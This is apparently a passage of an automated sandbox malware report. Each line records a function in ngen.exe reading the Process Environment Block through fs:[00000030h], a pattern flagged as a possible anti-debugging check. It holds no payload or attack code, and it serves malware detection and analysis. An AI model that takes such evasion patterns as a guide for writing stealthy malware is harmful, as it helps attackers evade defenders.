Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h] 4_2_058AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h] 4_2_0592F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h] 4_2_058BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h] 4_2_058BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 mov eax, dword ptr fs:[00000030h] 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593B52F mov eax, dword ptr fs:[00000030h] 4_2_0593B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h] 4_2_0588D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05888550 mov eax, dword ptr fs:[00000030h] 4_2_05888550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05888550 mov eax, dword ptr fs:[00000030h] 4_2_05888550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B656A mov eax, dword ptr fs:[00000030h] 4_2_058B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B656A mov eax, dword ptr fs:[00000030h] 4_2_058B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B656A mov eax, dword ptr fs:[00000030h] 4_2_058B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B562 mov eax, dword ptr fs:[00000030h] 4_2_0587B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h] 4_2_058BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h] 4_2_058BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B480 mov eax, dword ptr fs:[00000030h] 4_2_0587B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05889486 mov eax, dword ptr fs:[00000030h] 4_2_05889486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05889486 mov eax, dword ptr fs:[00000030h] 4_2_05889486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590A4B0 mov eax, dword ptr fs:[00000030h] 4_2_0590A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058864AB mov eax, dword ptr fs:[00000030h] 4_2_058864AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B34B0 mov eax, dword ptr fs:[00000030h] 4_2_058B34B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B44B0 mov ecx, dword ptr fs:[00000030h] 4_2_058B44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059554DB mov eax, dword ptr fs:[00000030h] 4_2_059554DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058804E5 mov ecx, dword ptr fs:[00000030h] 4_2_058804E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059294E0 mov eax, dword ptr fs:[00000030h] 4_2_059294E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A340D mov eax, dword ptr fs:[00000030h] 4_2_058A340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h] 4_2_058B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h] 4_2_058B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h] 4_2_058B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C427 mov eax, dword ptr fs:[00000030h] 4_2_0587C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h] 4_2_0587E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h] 4_2_0587E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h] 4_2_0587E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA430 mov eax, dword ptr fs:[00000030h] 4_2_058BA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F453 mov eax, dword ptr fs:[00000030h] 4_2_0593F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A245A mov eax, dword ptr fs:[00000030h] 4_2_058A245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587645D mov eax, dword ptr fs:[00000030h] 4_2_0587645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595547F mov eax, dword ptr fs:[00000030h] 4_2_0595547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h] 4_2_058AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h] 4_2_058AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h] 4_2_058AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F78A mov eax, dword ptr fs:[00000030h] 4_2_0593F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059537B6 mov eax, dword ptr fs:[00000030h] 4_2_059537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058807AF mov eax, dword ptr fs:[00000030h] 4_2_058807AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059097A9 mov eax, dword ptr fs:[00000030h] 4_2_059097A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD7B0 mov eax, dword ptr fs:[00000030h] 4_2_058AD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588C7C0 mov eax, dword ptr fs:[00000030h] 4_2_0588C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h] 4_2_058857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h] 4_2_058857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h] 4_2_058857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059007C3 mov eax, dword ptr fs:[00000030h] 4_2_059007C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h] 4_2_058A27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h] 4_2_058A27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h] 4_2_058A27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_0588D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058847FB mov eax, dword ptr fs:[00000030h] 4_2_058847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058847FB mov eax, dword ptr fs:[00000030h] 4_2_058847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05885702 mov eax, dword ptr fs:[00000030h] 4_2_05885702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05885702 mov eax, dword ptr fs:[00000030h] 4_2_05885702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05887703 mov eax, dword ptr fs:[00000030h] 4_2_05887703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC700 mov eax, dword ptr fs:[00000030h] 4_2_058BC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h] 4_2_058BF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h] 4_2_058BF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880710 mov eax, dword ptr fs:[00000030h] 4_2_05880710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0710 mov eax, dword ptr fs:[00000030h] 4_2_058B0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883720 mov eax, dword ptr fs:[00000030h] 4_2_05883720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h] 4_2_0595B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h] 4_2_0595B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h] 4_2_0595B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h] 4_2_0595B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h] 4_2_0589F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h] 4_2_0589F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h] 4_2_0589F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h] 4_2_058BC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h] 4_2_058BC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588973A mov eax, dword ptr fs:[00000030h] 4_2_0588973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588973A mov eax, dword ptr fs:[00000030h] 4_2_0588973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B273C mov eax, dword ptr fs:[00000030h] 4_2_058B273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B273C mov ecx, dword ptr fs:[00000030h] 4_2_058B273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B273C mov eax, dword ptr fs:[00000030h] 4_2_058B273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879730 mov eax, dword ptr fs:[00000030h] 4_2_05879730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879730 mov eax, dword ptr fs:[00000030h] 4_2_05879730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F72E mov eax, dword ptr fs:[00000030h] 4_2_0593F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FC730 mov eax, dword ptr fs:[00000030h] 4_2_058FC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594972B mov eax, dword ptr fs:[00000030h] 4_2_0594972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B5734 mov eax, dword ptr fs:[00000030h] 4_2_058B5734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05904755 mov eax, dword ptr fs:[00000030h] 4_2_05904755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B674D mov esi, dword ptr fs:[00000030h] 4_2_058B674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B674D mov eax, dword ptr fs:[00000030h] 4_2_058B674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B674D mov eax, dword ptr fs:[00000030h] 4_2_058B674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893740 mov eax, dword ptr fs:[00000030h] 4_2_05893740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893740 mov eax, dword ptr fs:[00000030h] 4_2_05893740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893740 mov eax, dword ptr fs:[00000030h] 4_2_05893740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880750 mov eax, dword ptr fs:[00000030h] 4_2_05880750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h] 4_2_058C2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h] 4_2_058C2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05953749 mov eax, dword ptr fs:[00000030h] 4_2_05953749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h] 4_2_0587B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h] 4_2_0587B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h] 4_2_0587B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h] 4_2_0587B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05888770 mov eax, dword ptr fs:[00000030h] 4_2_05888770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05884690 mov eax, dword ptr fs:[00000030h] 4_2_05884690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05884690 mov eax, dword ptr fs:[00000030h] 4_2_05884690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h] 4_2_0587D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h] 4_2_0587D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC6A6 mov eax, dword ptr fs:[00000030h] 4_2_058BC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B66B0 mov eax, dword ptr fs:[00000030h] 4_2_058B66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B16CF mov eax, dword ptr fs:[00000030h] 4_2_058B16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
